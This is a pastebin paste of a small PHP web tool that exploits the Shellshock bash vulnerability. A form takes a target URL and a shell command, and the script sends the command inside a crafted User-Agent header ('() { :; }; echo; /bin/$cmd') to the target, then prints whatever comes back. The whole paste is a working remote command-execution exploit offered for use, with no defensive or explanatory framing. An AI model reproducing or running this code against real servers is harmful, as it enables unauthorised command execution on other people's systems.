SHOW:
|
|
- or go back to the newest paste.
1 | <html> | |
2 | <form method="post"> | |
3 | Target: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/"> | |
4 | <input type="text" name="cmd" size="50" height="10" placeholder="uname -a"> | |
5 | <input type="submit" name="go" value="test"> | |
6 | </form> | |
7 | </html> | |
8 | <?php | |
9 | // coded by Evoo [ http://pastebin.com/u/Evoo ] | |
10 | // recoded by Mr. Error 404 ( WebBased Xploiter ) | |
11 | function pwn($site,$cmd) { | |
12 | $useragent = "() { :; }; echo; /bin/$cmd"; | |
13 | //$useragent = "() { :; }; echo; /bin/uname"; | |
14 | $ch = curl_init($site); | |
15 | curl_setopt($ch, CURLOPT_USERAGENT, $useragent); | |
16 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
17 | $postResult = curl_exec($ch); | |
18 | print "<pre>"; | |
19 | print_r("\t".$postResult); | |
20 | print "</pre>"; | |
21 | /*if (eregi("Linux",$postResult)){ | |
22 | echo "[+]Vulnerable\n"; | |
23 | }else{ | |
24 | echo "[-]Tidak Vuln\n"; | |
25 | } | |
26 | */ | |
27 | } | |
28 | $url = $_POST['url']; | |
29 | $cmd = $_POST['cmd']; | |
30 | $go = $_POST['go']; | |
31 | if(isset($go)) { | |
32 | echo "=> $url<br>"; | |
33 | pwn($url, $cmd); | |
34 | } | |
35 | ?> |